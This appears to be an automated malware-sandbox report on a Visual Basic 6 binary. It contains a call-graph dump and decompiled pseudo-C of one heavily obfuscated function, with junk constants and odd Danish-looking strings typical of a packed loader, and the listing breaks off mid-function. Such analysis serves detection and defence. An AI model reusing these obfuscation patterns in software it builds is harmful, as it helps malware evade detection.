3365->3367 3369 417511 3366->3369 3370 4174f9 __vbaNew2 3366->3370 3371 417551 3369->3371 3372 41753a __vbaHresultCheckObj 3369->3372 3370->3369 3373 417555 __vbaChkstk 3371->3373 3372->3373 3374 417589 3373->3374 3375 417594 __vbaHresultCheckObj 3374->3375 3376 4175ab 3374->3376 3377 4175af __vbaStrMove __vbaFreeObj 3375->3377 3376->3377 3377->3367 3136 416e2e __vbaChkstk 3137 416e70 __vbaInStr 3136->3137 3138 416e88 __vbaChkstk __vbaChkstk __vbaChkstk __vbaLateMemCall 3137->3138 3139 416efc #561 __vbaFreeVar 3137->3139 3138->3139 3140 417082 #589 3139->3140 3141 416f3c 3139->3141 3142 417090 __vbaEnd 3140->3142 3143 417095 __vbaFreeObj __vbaFreeObj 3140->3143 3144 416f60 3141->3144 3145 416f45 __vbaNew2 3141->3145 3142->3143 3147 416fbe 3144->3147 3148 416f9e __vbaHresultCheckObj 3144->3148 3145->3144 3149 416fc5 __vbaChkstk 3147->3149 3148->3149 3150 417002 3149->3150 3151 417033 3150->3151 3152 417013 __vbaHresultCheckObj 3150->3152 3153 41703a __vbaChkstk __vbaLateIdSt __vbaFreeObj __vbaFreeVar 3151->3153 3152->3153 3153->3140 3378 414bb3 6 API calls 3379 414c27 3378->3379 3380 414cd9 3378->3380 3381 414c30 __vbaNew2 3379->3381 3382 414c48 3379->3382 3381->3382 3383 414c71 __vbaHresultCheckObj 3382->3383 3384 414c88 3382->3384 3383->3384 3385 414cc5 3384->3385 3386 414cae __vbaHresultCheckObj 3384->3386 3387 414cc9 __vbaFreeObj 3385->3387 3386->3387 3387->3380 3285 4163f5 __vbaChkstk __vbaVarDup #553 __vbaVarTstNe __vbaFreeVarList 3286 41653e 3285->3286 3287 416487 3285->3287 3288 416569 3286->3288 3289 41654e __vbaNew2 3286->3289 3290 4164a6 3287->3290 3291 4164ae _adj_fdiv_m64 3287->3291 3294 4165b2 3288->3294 3295 416598 __vbaHresultCheckObj 3288->3295 3289->3288 3292 4164bf __vbaFpI4 3290->3292 3291->3292 3293 416516 3292->3293 3293->3286 3296 416521 __vbaHresultCheckObj 3293->3296 3297 416602 3294->3297 3298 4165e2 __vbaHresultCheckObj 3294->3298 3295->3294 3296->3286 3299 416609 __vbaFreeObj 3297->3299 3298->3299 3300 416649 3299->3300 2896 412874 __vbaChkstk 2897 4128c8 6 API calls 2896->2897 2898 412a0f __vbaFreeStr __vbaFreeVarList 2897->2898 2900 412a74 #716 __vbaChkstk __vbaLateIdSt __vbaFreeVar 2898->2900 2901 412abe #516 2898->2901 2900->2901 2902 412ad5 2901->2902 2903 412b24 #676 __vbaFpR8 2901->2903 2906 412b1d 2902->2906 2907 412afd __vbaHresultCheckObj 2902->2907 2904 412b8b __vbaFreeVarList 2903->2904 2908 412bd4 __vbaChkstk __vbaChkstk __vbaChkstk __vbaLateMemCall 2904->2908 2909 412c6e 2904->2909 2906->2903 2907->2903 2908->2909 2910 412c99 __vbaHresultCheckObj 2909->2910 2911 412cb9 2909->2911 2910->2911 2912 412d7f 2911->2912 2913 412d5f __vbaHresultCheckObj 2911->2913 2914 412e05 2912->2914 2915 412de5 __vbaHresultCheckObj 2912->2915 2913->2912 2916 412e68 2914->2916 2917 412e48 __vbaHresultCheckObj 2914->2917 2915->2914 2918 412f00 2916->2918 3056 4157fd __vbaChkstk 2916->3056 2917->2916 2919 412f59 2918->2919 2920 412f39 __vbaHresultCheckObj 2918->2920 2921 412fb9 2919->2921 2922 412f99 __vbaHresultCheckObj 2919->2922 2920->2919 2923 412fc0 __vbaStrCopy 2921->2923 2922->2923 3068 414f28 __vbaChkstk __vbaVarDup #663 __vbaVarTstNe __vbaFreeVarList 2923->3068 2925 413067 2926 4130df 2925->2926 2927 4130bf __vbaHresultCheckObj 2925->2927 2928 4130e6 __vbaStrCopy 2926->2928 2927->2928 2929 413123 __vbaFreeStr 2928->2929 2930 41317a 2929->2930 2931 41319e __vbaHresultCheckObj 2930->2931 2932 4131be 2930->2932 2931->2932 2933 413287 2932->2933 2934 413267 __vbaHresultCheckObj 2932->2934 2935 4132a3 2933->2935 3071 415128 __vbaChkstk 2933->3071 2934->2933 2936 4132b2 __vbaHresultCheckObj 2935->2936 2937 4132d2 2935->2937 2936->2937 3055 4157fd 6 API calls 2937->3055 2938 413398 2939 413458 2938->2939 2940 413438 __vbaHresultCheckObj 2938->2940 2941 4134a3 2939->2941 2942 413483 __vbaHresultCheckObj 2939->2942 2940->2939 3048 4157fd 6 API calls 2941->3048 2942->2941 2943 4134ee 2944 413568 2943->2944 2945 413548 __vbaHresultCheckObj 2943->2945 3050 4157fd 6 API calls 2944->3050 2945->2944 2946 4135db 3081 4170f9 7 API calls 2946->3081 2947 413636 2948 413681 2947->2948 2949 413661 __vbaHresultCheckObj 2947->2949 2950 4136da 2948->2950 2951 4136ba __vbaHresultCheckObj 2948->2951 2949->2948 2952 4136e1 __vbaStrCopy 2950->2952 2951->2952 2953 41371e __vbaFreeStr 2952->2953 2954 413767 2953->2954 2955 413816 2954->2955 2956 4137f6 __vbaHresultCheckObj 2954->2956 2957 413882 __vbaHresultCheckObj 2955->2957 2958 4138a2 2955->2958 2956->2955 2957->2958 2959 413979 2958->2959 2960 413959 __vbaHresultCheckObj 2958->2960 2961 413980 __vbaOnError 2959->2961 2960->2961 2962 4139b6 2961->2962 2963 4139e7 2962->2963 2964 4139c7 __vbaHresultCheckObj 2962->2964 2965 413a3a 2963->2965 2966 413a1a __vbaHresultCheckObj 2963->2966 2964->2963 2967 413a41 __vbaVarMove 2965->2967 2966->2967 2968 413a6e __vbaVarAdd __vbaVarMove 2967->2968 3047 4170f9 23 API calls 2968->3047 2969 413b22 __vbaHresultCheckObj 2972 413af7 2969->2972 2970 413b8b __vbaHresultCheckObj 2970->2972 2971 413c7f __vbaHresultCheckObj 2971->2972 2972->2969 2972->2970 2972->2971 2973 413cdf __vbaHresultCheckObj 2972->2973 2974 413d06 __vbaStrCopy 2972->2974 3051 4157fd 6 API calls 2972->3051 2973->2974 2975 413d55 __vbaFreeStr __vbaVarTstLt 2974->2975 2976 413da0 __vbaVarMove __vbaStrToAnsi __vbaStrToAnsi __vbaStrToAnsi 2975->2976 2977 413d9b 2975->2977 3102 4114dc 2976->3102 2977->2968 3047->2972 3048->2943 3050->2946 3051->2972 3055->2938 3104 41176c 3056->3104 3058 41583e __vbaSetSystemError 3059 4158c5 3058->3059 3060 41584f 3058->3060 3059->2918 3061 415870 3060->3061 3062 415858 __vbaNew2 3060->3062 3063 415877 __vbaObjSetAddref 3061->3063 3062->3063 3064 415897 3063->3064 3065 4158a2 __vbaHresultCheckObj 3064->3065 3066 4158b9 3064->3066 3067 4158bd __vbaFreeObj 3065->3067 3066->3067 3067->3059 3069 41300f __vbaFreeStr 3068->3069 3070 414fbd #532 3068->3070 3069->2925 3070->3069 3072 41516a __vbaStrToAnsi __vbaStrToAnsi 3071->3072 3106 411584 3072->3106 3082 417181 3081->3082 3083 417233 __vbaStrCmp 3081->3083 3086 4171a0 3082->3086 3087 4171a8 _adj_fdiv_m64 3082->3087 3084 417327 __vbaVarDup #645 __vbaStrMove __vbaFreeVar 3083->3084 3085 41724a 3083->3085 3088 417388 __vbaFreeStr __vbaFreeObj 3084->3088 3089 417253 __vbaNew2 3085->3089 3091 41726b 3085->3091 3090 4171b9 __vbaFpI4 3086->3090 3087->3090 3088->2947 3089->3091 3092 41720a 3090->3092 3095 417294 __vbaHresultCheckObj 3091->3095 3096 4172ab 3091->3096 3093 417215 __vbaHresultCheckObj 3092->3093 3094 41722f 3092->3094 3093->3083 3094->3083 3097 4172af __vbaChkstk 3095->3097 3096->3097 3098 4172e3 3097->3098 3099 417305 3098->3099 3100 4172ee __vbaHresultCheckObj 3098->3100 3101 417309 __vbaObjSet __vbaFreeObj 3099->3101 3100->3101 3101->3084 3103 4114e5 3102->3103 3105 411775 3104->3105 3105->3105 3107 41158d 3106->3107 3123 416a76 __vbaChkstk 3124 416ab6 #525 __vbaStrMove __vbaStrCmp __vbaFreeStr 3123->3124 3125 416af0 __vbaFPInt __vbaFpR8 3124->3125 3128 416aee 3124->3128 3126 416b0b __vbaFpI4 3125->3126 3125->3128 3127 416b22 3126->3127 3127->3128 3129 416b2d __vbaHresultCheckObj 3127->3129 3129->3128 3154 4016f7 __vbaFPException 3155 4158f9 __vbaChkstk __vbaLenBstrB 3156 415a48 #556 3155->3156 3157 41593b 3155->3157 3158 415af3 __vbaAryDestruct __vbaFreeStr __vbaFreeObj 3156->3158 3159 415a68 3156->3159 3160 415944 __vbaNew2 3157->3160 3161 41595c 3157->3161 3163 415a71 __vbaNew2 3159->3163 3164 415a8c 3159->3164 3160->3161 3165 415985 __vbaHresultCheckObj 3161->3165 3166 41599f 3161->3166 3163->3164 3167 415ad7 3164->3167 3168 415abd __vbaHresultCheckObj 3164->3168 3169 4159a6 __vbaChkstk 3165->3169 3166->3169 3170 415ade __vbaStrMove 3167->3170 3168->3170 3171 4159da 3169->3171 3170->3158 3172 4159e5 __vbaHresultCheckObj 3171->3172 3173 4159ff 3171->3173 3174 415a06 __vbaChkstk __vbaLateIdSt __vbaFreeObj __vbaFreeVar 3172->3174 3173->3174 3174->3156 3269 401739 _adj_fprem 3175 4168fa __vbaChkstk 3176 41693a #541 __vbaStrVarMove __vbaStrMove __vbaFreeVar 3175->3176 3177 416984 3176->3177 3178 41696c __vbaNew2 3176->3178 3179 4169c4 3177->3179 3180 4169ad __vbaHresultCheckObj 3177->3180 3178->3177 3181 416a05 3179->3181 3182 4169eb __vbaHresultCheckObj 3179->3182 3180->3179 3183 416a09 __vbaStrMove __vbaFreeObj 3181->3183 3182->3183 3184 416a46 __vbaFreeStr __vbaFreeStr 3183->3184 3270 41493a __vbaChkstk 3275 41497a 3270->3275 3271 4149b9 #560 __vbaFreeVar 3272 414a65 __vbaFreeVar 3271->3272 3273 4149e8 3271->3273 3276 4149f1 __vbaNew2 3273->3276 3277 414a09 3273->3277 3275->3271 3278 4149b5 3275->3278 3279 41499b __vbaHresultCheckObj 3275->3279 3280 414a10 __vbaObjVar __vbaObjSetAddref 3276->3280 3277->3280 3278->3271 3279->3271 3281 414a37 3280->3281 3282 414a42 __vbaHresultCheckObj 3281->3282 3283 414a59 3281->3283 3284 414a5d __vbaFreeObj 3282->3284 3283->3284 3284->3272

              Executed Functions

              Function 00412874, Relevance: 288.8, APIs: 140, Strings: 24, Instructions: 1783COMMON
              Download Yara Rule
              C-Code - Quality: 62%
              			E00412874(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int _a4) {
				void* _v5;
				char _v8;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				long long* _v28;
				intOrPtr _v40;
				long long _v48;
				intOrPtr _v52;
				long long _v60;
				long long _v68;
				char _v72;
				long long _v76;
				void* _v80;
				void* _v96;
				signed int _v100;
				long long _v108;
				short _v112;
				short _v116;
				char _v132;
				long long _v140;
				signed int _v144;
				short _v148;
				void* _v152;
				long long _v160;
				intOrPtr _v164;
				short _v168;
				short _v172;
				long long _v180;
				long long _v188;
				short _v192;
				long long _v200;
				char _v204;
				intOrPtr _v208;
				long long _v212;
				long long _v220;
				short _v224;
				signed int _v228;
				signed int _v232;
				long long _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				long long _v252;
				intOrPtr _v256;
				long long _v260;
				intOrPtr _v264;
				short _v268;
				short _v272;
				short _v276;
				short _v280;
				short _v284;
				long long _v292;
				intOrPtr _v296;
				long long _v300;
				intOrPtr _v304;
				long long _v308;
				char _v312;
				char _v316;
				char _v320;
				signed int _v324;
				char _v328;
				signed int _v336;
				char _v344;
				signed int _v352;
				char _v360;
				signed int _v368;
				char _v376;
				signed int _v384;
				char _v392;
				signed int _v400;
				char _v408;
				signed int _v416;
				char _v424;
				signed int _v432;
				char _v440;
				signed int _v444;
				signed int _v448;
				char _v456;
				char* _v480;
				intOrPtr _v488;
				intOrPtr _v512;
				intOrPtr _v520;
				short _v556;
				void* _v560;
				signed int _v564;
				char _v568;
				char _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				long long _v584;
				intOrPtr _v588;
				long long _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int _v736;
				signed int* _v740;
				signed int _v744;
				signed int* _v748;
				signed int _v752;
				signed int _v756;
				signed int* _v760;
				signed int _v764;
				char* _t984;
				signed int _t992;
				signed int _t1003;
				signed int _t1015;
				signed int _t1022;
				signed int _t1027;
				signed int _t1044;
				signed int _t1049;
				signed int _t1068;
				signed int _t1081;
				signed int _t1092;
				signed int _t1095;
				signed int _t1122;
				signed int _t1125;
				signed int _t1136;
				signed int _t1156;
				signed int _t1160;
				signed int _t1182;
				signed int _t1189;
				signed int _t1203;
				signed int _t1207;
				signed int _t1213;
				signed int _t1225;
				signed int _t1231;
				signed int _t1248;
				signed int _t1253;
				char* _t1261;
				char* _t1262;
				char* _t1265;
				char* _t1269;
				char* _t1270;
				short _t1279;
				char* _t1286;
				signed int _t1287;
				signed int _t1293;
				signed int _t1295;
				signed int _t1301;
				signed int _t1302;
				signed int _t1306;
				signed int _t1307;
				signed int _t1311;
				signed int _t1329;
				char* _t1333;
				signed int* _t1338;
				char* _t1354;
				signed int* _t1355;
				signed int _t1358;
				signed int _t1365;
				char* _t1369;
				char* _t1373;
				char* _t1375;
				char* _t1377;
				void* _t1435;
				void* _t1438;
				long long* _t1439;
				void* _t1440;
				long long* _t1441;
				intOrPtr* _t1442;
				void* _t1443;
				void* _t1444;
				signed int _t1450;
				long long _t1478;
				long long _t1520;

				_t1439 = _t1438 - 0x18;
				 *[fs:0x0] = _t1439;
				L004016F0();
				_v28 = _t1439;
				_v24 = E004011A8;
				_v20 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				_v16 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4016f6, _t1435);
				_v8 = 1;
				_v8 = 2;
				_v368 = 0x80020004;
				_v376 = 0xa;
				_v352 = 0x80020004;
				_v360 = 0xa;
				_v336 = 0x80020004;
				_v344 = 0xa;
				_push( &_v376);
				_push( &_v360);
				_push( &_v344);
				_t1478 =  *0x401480;
				_v72 = _t1478;
				asm("fld1");
				_v80 = _t1478;
				asm("fld1");
				 *_t1439 = _t1478;
				L00401948();
				_v188 = _t1478;
				_push( &_v376);
				_push( &_v360);
				_push( &_v344);
				_push(3);
				L00401942();
				_t1440 = _t1439 + 0x10;
				_v8 = 3;
				_v384 = 5;
				_v392 = 2;
				_v368 = 0x63;
				_v376 = 2;
				_t31 =  &_v352;
				 *_t31 = _v352 & 0x00000000;
				_v360 = 2;
				_v336 = 0x64;
				_v344 = 2;
				_push( &_v392);
				_push( &_v376);
				_push( &_v360);
				_push( &_v344);
				_push( &_v408);
				L0040192A();
				_push( &_v408);
				_t984 =  &_v312;
				_push(_t984);
				L00401930();
				_push(_t984);
				L00401936();
				L0040193C();
				asm("fcomp qword [0x401478]");
				asm("fnstsw ax");
				asm("sahf");
				if( *_t31 == 0) {
					_t44 =  &_v632;
					 *_t44 = _v632 & 0x00000000;
					__eflags =  *_t44;
				} else {
					_v632 = 1;
				}
				_v596 =  ~_v632;
				_t1369 =  &_v312;
				L00401924();
				_push( &_v408);
				_push( &_v392);
				_push( &_v376);
				_push( &_v360);
				_push( &_v344);
				_push(5);
				L00401942();
				_t1441 = _t1440 + 0x18;
				_t992 = _v596;
				if(_t992 != 0) {
					_v8 = 4;
					_v8 = 5;
					_push(0);
					_push(L"Filmselskabets");
					_push( &_v344);
					L00401918();
					_t992 = 0x10;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v52);
					L0040191E();
					_t1369 =  &_v344;
					L00401912();
				}
				_v8 = 7;
				_push(0x411918);
				L0040190C();
				if(_t992 != 0x61) {
					_v8 = 8;
					_t1365 =  *((intOrPtr*)( *_a4 + 0x254))(_a4, 0x73);
					asm("fclex");
					_v596 = _t1365;
					_t1450 = _v596;
					if(_t1450 >= 0) {
						_t71 =  &_v636;
						 *_t71 = _v636 & 0x00000000;
						__eflags =  *_t71;
					} else {
						_push(0x254);
						_push(0x41046c);
						_push(_a4);
						_push(_v596);
						L00401906();
						_v636 = _t1365;
					}
				}
				_v8 = 0xa;
				_v352 = 0x80020004;
				_v360 = 0xa;
				_v336 = 0x80020004;
				_v344 = 0xa;
				_push( &_v360);
				_push( &_v344);
				asm("fld1");
				_push(_t1369);
				_push(_t1369);
				_v140 = _t1478;
				asm("fld1");
				_push(_t1369);
				_push(_t1369);
				_v148 = _t1478;
				asm("fld1");
				_push(_t1369);
				_push(_t1369);
				 *_t1441 = _t1478;
				L00401900();
				L0040193C();
				asm("fcomp qword [0x401470]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t1450 == 0) {
					_t81 =  &_v640;
					 *_t81 = _v640 & 0x00000000;
					__eflags =  *_t81;
				} else {
					_v640 = 1;
				}
				_v596 =  ~_v640;
				_push( &_v360);
				_push( &_v344);
				_push(2);
				L00401942();
				_t1442 = _t1441 + 0xc;
				if(_v596 != 0) {
					_v8 = 0xb;
					_v8 = 0xc;
					_v448 = _a4;
					_v456 = 9;
					_v480 = L"solicit";
					_v488 = 8;
					_v512 = 0x58e1c9;
					_v520 = 3;
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(3);
					_push(L"NzXRmXMzPSdU58");
					_push(_v244);
					L004018FA();
					_t1442 = _t1442 + 0x3c;
				}
				_v8 = 0xe;
				_t1003 =  *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v564);
				_v596 = _t1003;
				if(_v596 >= 0) {
					_t111 =  &_v644;
					 *_t111 = _v644 & 0x00000000;
					__eflags =  *_t111;
				} else {
					_push(0x718);
					_push(0x41049c);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v644 = _t1003;
				}
				_v80 = _v564;
				_v8 = 0xf;
				 *((intOrPtr*)( *_a4 + 0x738))(_a4);
				_v8 = 0x10;
				_v556 = 0x41cc;
				 *((intOrPtr*)( *_a4 + 0x74c))(_a4, L"samtaleemnetsrhes",  &_v556, 0x75dd00, 0x6d83);
				_v8 = 0x11;
				_v584 =  *0x401468;
				_t1015 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, 0x8904d3f8,  &_v584, 0x6cab, 0x98e72e79,  &_v592);
				_v596 = _t1015;
				if(_v596 >= 0) {
					_t137 =  &_v648;
					 *_t137 = _v648 & 0x00000000;
					__eflags =  *_t137;
				} else {
					_push(0x708);
					_push(0x41049c);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v648 = _t1015;
				}
				_v76 = _v592;
				_v72 = _v588;
				_v8 = 0x12;
				_v584 =  *0x401460;
				_t1022 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, 0x717675,  &_v584, 0x3f22, 0x98e72e79,  &_v592);
				_v596 = _t1022;
				if(_v596 >= 0) {
					_t155 =  &_v652;
					 *_t155 = _v652 & 0x00000000;
					__eflags =  *_t155;
				} else {
					_push(0x708);
					_push(0x41049c);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v652 = _t1022;
				}
				_v260 = _v592;
				_v256 = _v588;
				_v8 = 0x13;
				_t1027 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
				_v596 = _t1027;
				if(_v596 >= 0) {
					_t170 =  &_v656;
					 *_t170 = _v656 & 0x00000000;
					__eflags =  *_t170;
				} else {
					_push(0x6f8);
					_push(0x41049c);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v656 = _t1027;
				}
				_v8 = 0x14;
				_v556 = 0x1854;
				_v584 =  *0x401458;
				 *((intOrPtr*)( *_a4 + 0x724))(_a4,  &_v584, 0x8904d3f8,  &_v556,  &_v592);
				_v60 = _v592;
				_v8 = 0x15;
				_v556 = 0x5bd9;
				_v584 =  *0x401450;
				 *((intOrPtr*)( *_a4 + 0x73c))(_a4, 0x37b,  &_v584,  &_v556,  &_v560);
				_v276 = _v560;
				_v8 = 0x16;
				_t1044 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v556);
				_v596 = _t1044;
				if(_v596 >= 0) {
					_t204 =  &_v660;
					 *_t204 = _v660 & 0x00000000;
					__eflags =  *_t204;
				} else {
					_push(0x6fc);
					_push(0x41049c);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v660 = _t1044;
				}
				_v148 = _v556;
				_v8 = 0x17;
				_t1049 =  *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v564);
				_v596 = _t1049;
				if(_v596 >= 0) {
					_t218 =  &_v664;
					 *_t218 = _v664 & 0x00000000;
					__eflags =  *_t218;
				} else {
					_push(0x718);
					_push(0x41049c);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v664 = _t1049;
				}
				_v228 = _v564;
				_v8 = 0x18;
				L004018F4();
				_v556 = 0x5b73;
				 *((intOrPtr*)( *_a4 + 0x72c))(_a4,  &_v556,  &_v312,  &_v584);
				_v68 = _v584;
				L00401924();
				_v8 = 0x19;
				_v556 = 0x44eb;
				_v584 =  *0x401448;
				 *((intOrPtr*)( *_a4 + 0x724))(_a4,  &_v584, 0x98e72e79,  &_v556,  &_v592);
				_v240 = _v592;
				_v8 = 0x1a;
				 *((intOrPtr*)( *_a4 + 0x750))(_a4,  &_v584);
				_v180 = _v584;
				_v8 = 0x1b;
				_t1068 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
				_v596 = _t1068;
				if(_v596 >= 0) {
					_t261 =  &_v668;
					 *_t261 = _v668 & 0x00000000;
					__eflags =  *_t261;
				} else {
					_push(0x6f8);
					_push(0x41049c);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v668 = _t1068;
				}
				_v8 = 0x1c;
				L004018F4();
				 *((intOrPtr*)( *_a4 + 0x728))(_a4, 0x1bd458,  &_v312, 0x5dfa,  &_v584);
				_v108 = _v584;
				_t1373 =  &_v312;
				L00401924();
				_v8 = 0x1d;
				_v564 = 0x98e72e79;
				_v584 =  *0x401440;
				 *((intOrPtr*)( *_a4 + 0x730))(_a4,  &_v584, 0x53f0,  &_v564, 0x63dcbf);
				_v8 = 0x1e;
				_t1081 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
				_v596 = _t1081;
				if(_v596 >= 0) {
					_t290 =  &_v672;
					 *_t290 = _v672 & 0x00000000;
					__eflags =  *_t290;
				} else {
					_push(0x6f8);
					_push(0x41049c);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v672 = _t1081;
				}
				_v8 = 0x1f;
				_v556 = 0x66dc;
				_v400 =  *0x401438;
				 *((intOrPtr*)( *_a4 + 0x734))(_a4,  &_v556, _t1373, 0x8904d3f8,  &_v584);
				_v308 = _v584;
				_v304 = _v580;
				_v8 = 0x20;
				_v564 = 0x8904d3f8;
				_v432 =  *0x401430;
				_t1092 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, _t1373, _t1373,  &_v564, 0xf1, 0xcdba990, 0x5b00);
				_v596 = _t1092;
				if(_v596 >= 0) {
					_t314 =  &_v676;
					 *_t314 = _v676 & 0x00000000;
					__eflags =  *_t314;
				} else {
					_push(0x70c);
					_push(0x41049c);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v676 = _t1092;
				}
				_v8 = 0x21;
				_t1095 =  *((intOrPtr*)( *_a4 + 0x700))(_a4);
				_v596 = _t1095;
				if(_v596 >= 0) {
					_t325 =  &_v680;
					 *_t325 = _v680 & 0x00000000;
					__eflags =  *_t325;
				} else {
					_push(0x700);
					_push(0x41049c);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v680 = _t1095;
				}
				_v8 = 0x22;
				_v556 = 0x86;
				 *((intOrPtr*)( *_a4 + 0x748))(_a4, 0x86,  &_v556, 0x5b0c);
				_v8 = 0x23;
				_v584 =  *0x401428;
				 *_t1442 =  *0x401420;
				 *((intOrPtr*)( *_a4 + 0x754))(_a4, 0x462b,  &_v584, _t1373,  &_v556);
				_v272 = _v556;
				_v8 = 0x24;
				_v556 = 0x59;
				_v584 =  *0x401418;
				 *((intOrPtr*)( *_a4 + 0x73c))(_a4, 0x5b0c,  &_v584,  &_v556,  &_v560);
				_v116 = _v560;
				_v8 = 0x25;
				_v584 =  *0x401410;
				 *_t1442 =  *0x401408;
				 *((intOrPtr*)( *_a4 + 0x754))(_a4, 0x69,  &_v584, _t1373,  &_v556);
				_v268 = _v556;
				_v8 = 0x26;
				_v564 = 0x98e72e79;
				 *_t1442 =  *0x401400;
				_t1122 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, _t1373, _t1373,  &_v564, 0x12, 0xb33c5640, 0x5b05);
				_v596 = _t1122;
				if(_v596 >= 0) {
					_t373 =  &_v684;
					 *_t373 = _v684 & 0x00000000;
					__eflags =  *_t373;
				} else {
					_push(0x70c);
					_push(0x41049c);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v684 = _t1122;
				}
				_v8 = 0x27;
				_t1125 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
				_v596 = _t1125;
				if(_v596 >= 0) {
					_t384 =  &_v688;
					 *_t384 = _v688 & 0x00000000;
					__eflags =  *_t384;
				} else {
					_push(0x6f8);
					_push(0x41049c);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v688 = _t1125;
				}
				_v8 = 0x28;
				_v556 = 0x1a82;
				_v584 =  *0x4013f8;
				 *((intOrPtr*)( *_a4 + 0x73c))(_a4, 0x596b,  &_v584,  &_v556,  &_v560);
				_v112 = _v560;
				_v8 = 0x29;
				_v564 = 0x2329eb;
				_t399 =  &_v564; // 0x2329eb
				_v592 =  *0x4013f0;
				_t1136 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, _t1373, _t1373, _t399, 0x9d, 0x3b889c20, 0x5b06);
				_v596 = _t1136;
				if(_v596 >= 0) {
					_t408 =  &_v692;
					 *_t408 = _v692 & 0x00000000;
					__eflags =  *_t408;
				} else {
					_push(0x70c);
					_push(0x41049c);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v692 = _t1136;
				}
				_v8 = 0x2a;
				 *((intOrPtr*)( *_a4 + 0x750))(_a4,  &_v584);
				_v140 = _v584;
				_v8 = 0x2b;
				_v556 = 0x1fe;
				_v584 =  *0x4013e8;
				 *((intOrPtr*)( *_a4 + 0x73c))(_a4, 0x1d56,  &_v584,  &_v556,  &_v560);
				_v224 = _v560;
				_v8 = 0x2c;
				_v556 = 0x37b;
				_v564 =  *0x4013e0;
				_v632 =  *0x4013d8;
				_t432 =  &_v564; // 0x2329eb
				 *((intOrPtr*)( *_a4 + 0x758))(_a4, _t432, 0xdbe6dc20, 0x5af4,  &_v556, _t1373, _t1373);
				_v8 = 0x2d;
				_t1156 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v556);
				_v596 = _t1156;
				if(_v596 >= 0) {
					_t446 =  &_v696;
					 *_t446 = _v696 & 0x00000000;
					__eflags =  *_t446;
				} else {
					_push(0x6fc);
					_push(0x41049c);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v696 = _t1156;
				}
				_v192 = _v556;
				_v8 = 0x2e;
				_t1160 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
				_v596 = _t1160;
				if(_v596 >= 0) {
					_t459 =  &_v700;
					 *_t459 = _v700 & 0x00000000;
					__eflags =  *_t459;
				} else {
					_push(0x6f8);
					_push(0x41049c);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v700 = _t1160;
				}
				_v8 = 0x2f;
				L004018F4();
				 *((intOrPtr*)( *_a4 + 0x728))(_a4, 0x8904d3f8,  &_v312, 0x742e,  &_v584);
				_v220 = _v584;
				_t1375 =  &_v312;
				L00401924();
				_v8 = 0x30;
				_v564 = 0x8904d3f8;
				 *((intOrPtr*)( *_a4 + 0x740))(_a4,  &_v564, 0x98e72e79,  &_v584);
				_v212 = _v584;
				_v208 = _v580;
				_v8 = 0x31;
				_v584 =  *0x4013d0;
				_v708 =  *0x4013c8;
				 *((intOrPtr*)( *_a4 + 0x754))(_a4, 0x3a20,  &_v584, _t1375,  &_v556);
				_v172 = _v556;
				_v8 = 0x32;
				_t1182 =  *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v584);
				_v596 = _t1182;
				if(_v596 >= 0) {
					_t501 =  &_v704;
					 *_t501 = _v704 & 0x00000000;
					__eflags =  *_t501;
				} else {
					_push(0x710);
					_push(0x41049c);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v704 = _t1182;
				}
				_v252 = _v584;
				_v248 = _v580;
				_v8 = 0x33;
				_v584 =  *0x4013c0;
				_t1189 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, 0x98e72e79,  &_v584, 0x3457, 0x98e72e79,  &_v592);
				_v596 = _t1189;
				if(_v596 >= 0) {
					_t519 =  &_v708;
					 *_t519 = _v708 & 0x00000000;
					__eflags =  *_t519;
				} else {
					_push(0x708);
					_push(0x41049c);
